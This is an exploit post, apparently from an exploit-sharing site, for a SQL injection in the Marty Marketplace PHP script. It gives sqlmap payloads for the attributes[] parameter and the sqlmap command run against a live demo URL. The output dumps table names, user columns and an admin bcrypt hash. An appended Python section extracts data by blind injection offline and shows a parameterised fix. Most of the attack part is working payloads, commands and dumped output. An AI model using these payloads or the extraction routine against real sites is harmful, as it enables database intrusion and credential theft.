CraCkEr - THE CRACK OF ETERNAL MIGHT
From The Ashes and Dust Rises An Unimaginable crack....

[ Exploits ]

Author    : CraCkEr
Website   : sangvish.com
Vendor    : SangVish Technologies
Software  : Marty Marketplace Multi Vendor Ecommerce Script v1.2
            (open source marketplace PHP script for eCommerce marketplace platforms in the market)
Vuln Type : Remote SQL Injection
Method    : GET
Impact    : Database Access

B4nks-NET irc.b4nks.tk #unix

Release Notes:
═════════════
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Greets: Phr33k, NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear
CryptoJob (Twitter) twitter.com/CryptozJob
Special Greetz to The Lebanese National Basketball Team for the results of the FIBA Asia Cup

© CraCkEr 2022

GET parameter 'attributes[]' is vulnerable

---
Parameter: attributes[] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END))

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)
---

Demo: https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6

[+] Starting the Attack

sqlmap.py -u "https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6" --current-db --batch

[+] fetching current database
[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[INFO] retrieved: 'garudan_buy2marty'
current database: 'garudan_buy2marty'

[+] fetching tables for database: 'garudan_buy2marty'
Database: garudan_buy2marty
[105 tables]
+----------------------------------------+
| activations                            |
| ads                                    |
| ads_translations                       |
| audit_histories                        |
| categories                             |
| categories_translations                |
| contact_replies                        |
| contacts                               |
| dashboard_widget_settings              |
| dashboard_widgets                      |
| ec_brands                              |
| ec_brands_translations                 |
| ec_cart                                |
| ec_currencies                          |
| ec_customer_addresses                  |
| ec_customer_password_resets            |
| ec_customers                           |
| ec_discount_customers                  |
| ec_discount_product_collections        |
| ec_discount_products                   |
| ec_discounts                           |
| ec_flash_sale_products                 |
| ec_flash_sales                         |
| ec_flash_sales_translations            |
| ec_grouped_products                    |
| ec_order_addresses                     |
| ec_order_histories                     |
| ec_order_product                       |
| ec_orders                              |
| ec_product_attribute_sets              |
| ec_product_attribute_sets_translations |
| ec_product_attributes                  |
| ec_product_attributes_translations     |
| ec_product_categories                  |
| ec_product_categories_translations     |
| ec_product_category_product            |
| ec_product_collection_products         |
| ec_product_collections                 |
| ec_product_collections_translations    |
| ec_product_cross_sale_relations        |
| ec_product_label_products              |
| ec_product_labels                      |
| ec_product_labels_translations         |
| ec_product_related_relations           |
| ec_product_tag_product                 |
| ec_product_tags                        |
| ec_product_tags_translations           |
| ec_product_up_sale_relations           |
| ec_product_variation_items             |
| ec_product_variations                  |
| ec_product_with_attribute              |
| ec_product_with_attribute_set          |
| ec_products                            |
| ec_products_translations               |
| ec_reviews                             |
| ec_shipment_histories                  |
| ec_shipments                           |
| ec_shipping                            |
| ec_shipping_rule_items                 |
| ec_shipping_rules                      |
| ec_store_locators                      |
| ec_taxes                               |
| ec_wish_lists                          |
| failed_jobs                            |
| faq_categories                         |
| faq_categories_translations            |
| faqs                                   |
| faqs_translations                      |
| jobs                                   |
| language_meta                          |
| languages                              |
| media_files                            |
| media_folders                          |
| media_settings                         |
| menu_locations                         |
| menu_nodes                             |
| menus                                  |
| meta_boxes                             |
| migrations                             |
| mp_customer_revenues                   |
| mp_customer_withdrawals                |
| mp_stores                              |
| mp_vendor_info                         |
| newsletters                            |
| pages                                  |
| pages_translations                     |
| password_resets                        |
| payments                               |
| post_categories                        |
| post_tags                              |
| posts                                  |
| posts_translations                     |
| revisions                              |
| role_users                             |
| roles                                  |
| settings                               |
| simple_slider_items                    |
| simple_sliders                         |
| slugs                                  |
| tags                                   |
| tags_translations                      |
| translations                           |
| user_meta                              |
| users                                  |
| widgets                                |
+----------------------------------------+

[+] fetching columns for table 'users' in database 'garudan_buy2marty'
Database: garudan_buy2marty
Table: users
[15 columns]
+-------------------+---------------------+
| Column            | Type                |
+-------------------+---------------------+
| avatar_id         | int(10) unsigned    |
| created_at        | timestamp           |
| email             | varchar(191)        |
| email_verified_at | timestamp           |
| first_name        | varchar(191)        |
| id                | bigint(20) unsigned |
| last_login        | timestamp           |
| last_name         | varchar(191)        |
| manage_supers     | tinyint(1)          |
| password          | varchar(191)        |
| permissions       | text                |
| remember_token    | varchar(100)        |
| super_user        | tinyint(1)          |
| updated_at        | timestamp           |
| username          | varchar(60)         |
+-------------------+---------------------+

[+] fetching entries of column(s) 'id,password,permissions,super_user,username' for table 'users' in database 'garudan_buy2marty'
Database: garudan_buy2marty
Table: users
[1 entry]
+----+----------+--------------------------------------------------------------+------------+-------------+
| id | username | password                                                     | super_user | permissions |
+----+----------+--------------------------------------------------------------+------------+-------------+
| 1  | admin    | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae/w8KOWAW/G6qlHRri6XPRW/2 | 1          | NULL        |
+----+----------+--------------------------------------------------------------+------------+-------------+

Possible algorithms: bcrypt $2*$, Blowfish (Unix)

[-] Done
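How the "parameter replace" boolean-based blind payload above turns a product filter into a yes/no oracle, as an added example that is not code from the advisory or from the Marty Marketplace script. The advisory does not show the application's handler, so the example assumes one that interpolates each attributes[] value into an IN list (hypothetical products_by_attribute_vulnerable), which is the pattern the payloads imply; the schema, rows and the admin username are constructed sample data. The CASE expression evaluates to the original value 6 when the probed condition holds and to something that breaks the query otherwise, so "page looks like the baseline" means "condition true", and sqlmap binary-searches characters on that bit. On MySQL the ELSE branch in the advisory's payload is a two-row scalar subquery, which raises "Subquery returns more than one row"; SQLite silently takes the first row, so this example uses a non-matching id 0 in the ELSE branch instead, and the oracle treats both a SQL error and a changed result set as "false". The GTID_SUBSET and SLEEP payloads are MySQL-only and are not modelled. The hardened handler validates and binds each id, which is the fix a practitioner would ship.

```python
"""Boolean-based blind SQL injection via a PHP-style `attributes[]` array
parameter, reproduced offline on SQLite.

Added example; the handler shape, schema and rows are constructed here and
are not the vendor's code.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database mimicking a few of the dumped table names."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE ec_products (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE ec_product_with_attribute (product_id INTEGER, attribute_id INTEGER);
        INSERT INTO users VALUES (1, 'admin', '$2y$10$placeholder-not-a-real-hash');
        INSERT INTO ec_products VALUES (1, 'Shirt'), (2, 'Shoes');
        INSERT INTO ec_product_with_attribute VALUES (1, 6), (2, 6), (2, 7);
    """)
    return conn


_BASE_SQL = (
    "SELECT DISTINCT p.id FROM ec_products p "
    "JOIN ec_product_with_attribute a ON a.product_id = p.id "
    "WHERE a.attribute_id IN ({}) ORDER BY p.id"
)


def products_by_attribute_vulnerable(conn, attributes):
    """Hypothetical vulnerable handler: every attributes[] value is pasted
    into the IN list as SQL text, so a CASE/subquery payload is parsed as code."""
    sql = _BASE_SQL.format(", ".join(attributes))
    return [row[0] for row in conn.execute(sql)]


def products_by_attribute_hardened(conn, attributes):
    """Hardened handler: each value must be an integer id and is bound as a
    parameter; untrusted text never reaches the SQL parser."""
    ids = []
    for value in attributes:
        if not value.isdigit():
            raise ValueError(f"invalid attribute id: {value!r}")
        ids.append(int(value))
    sql = _BASE_SQL.format(", ".join("?" * len(ids)))
    return [row[0] for row in conn.execute(sql, ids)]


def blind_oracle(handler, conn, condition: str) -> bool:
    """True iff `condition` holds, judged only from whether the handler still
    returns the baseline result for attribute 6 (the sqlmap 'parameter
    replace (original value)' technique)."""
    baseline = handler(conn, ["6"])
    payload = f"(SELECT (CASE WHEN ({condition}) THEN 6 ELSE 0 END))"
    try:
        return handler(conn, [payload]) == baseline
    except (sqlite3.Error, ValueError):
        # A broken query (the MySQL multi-row subquery error on the real
        # target) or a rejected value both read as "condition false".
        return False


def extract_string(handler, conn, scalar_query: str, max_len: int = 64) -> str:
    """Recover the result of `scalar_query` one character at a time with a
    binary search on each code point, roughly 7 requests per character."""
    out = ""
    for pos in range(1, max_len + 1):
        if not blind_oracle(handler, conn, f"length(({scalar_query})) >= {pos}"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"unicode(substr(({scalar_query}), {pos}, 1)) > {mid}"
            if blind_oracle(handler, conn, probe):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    target = "SELECT username FROM users WHERE id = 1"
    print("vulnerable handler leaks:", extract_string(products_by_attribute_vulnerable, db, target))
    print("hardened handler leaks:  ", repr(extract_string(products_by_attribute_hardened, db, target)))
```

Against the vulnerable handler the extractor recovers the constructed admin username; against the hardened one every probe is rejected before it reaches the database, so nothing is recovered and the legitimate filter (attributes[]=6&attributes[]=7) still returns the same products.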